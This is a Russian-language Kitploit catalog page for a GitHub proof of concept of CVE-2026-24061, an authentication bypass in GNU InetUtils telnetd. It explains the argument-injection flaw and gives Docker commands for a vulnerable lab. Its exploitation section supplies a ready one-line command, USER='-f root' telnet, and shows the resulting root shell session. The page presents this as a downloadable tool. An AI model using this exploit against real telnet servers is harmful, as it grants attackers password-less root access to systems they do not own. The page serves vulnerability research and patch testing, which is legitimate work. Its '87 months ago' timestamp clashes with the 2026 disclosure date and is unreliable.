Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061 — GNU telnetd служба из GNU InetUtils обход аутентификации | Kitploit
Инструменты/GitHubGitHub/typeconfused/cve-2026-24061
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubtypeconfused/cve-2026-24061

CVE-2026-24061

GNU telnetd служба из GNU InetUtils обход аутентификации

Репозиторий
87 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GNU InetUtils telnetd: обход аутентификации через внедрение аргументов (CVE-2026-24061)

В январе 2026 года служба GNU telnetd из состава GNU InetUtils была признана уязвимой к обходу аутентификации, о чём сообщил Kyu Neushwaistein (он же Carlos Cortes Alvarez). Отслеживаемая как CVE-2026-24061, эта уязвимость позволяет злоумышленнику установить Telnet-сеанс без предоставления действительных учётных данных, получая несанкционированный доступ к целевой системе. Уязвимость присутствует вплоть до версии 2.7-2 службы GNU telnetd и выглядит так, будто она взята прямиком из 90-х.

Это уязвимость внедрения аргументов (CWE-88) с оценкой CVSS v3.1 9.8 (критическая).

Ссылки:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24061
  • https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
  • https://github.com/SafeBreach-Labs/CVE-2026-24061

Уязвимая среда

Сборка и запуск:

root@kitploit:~
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061

После запуска службы telnetd будет прослушивать порт 23.

Эксплуатация

Уязвимость позволяет обойти аутентификацию путём внедрения флага -f в переменную окружения USER. Когда telnetd получает имя пользователя, начинающееся с -f, он передаёт его программе login, которая интерпретирует -f как флаг пропуска аутентификации.

Используйте следующую команду для эксплуатации этой уязвимости и получения доступа root:

root@kitploit:~
# Linux-клиент (требуется опция -a)
USER="-f root" telnet -a 127.0.0.1 23

# macOS-клиент (опция -a не требуется)
USER="-f root" telnet 127.0.0.1 23

После успешной эксплуатации вы получите root-доступ к оболочке без ввода пароля.

root@kitploit:~
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)

Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)
Скачать инструмент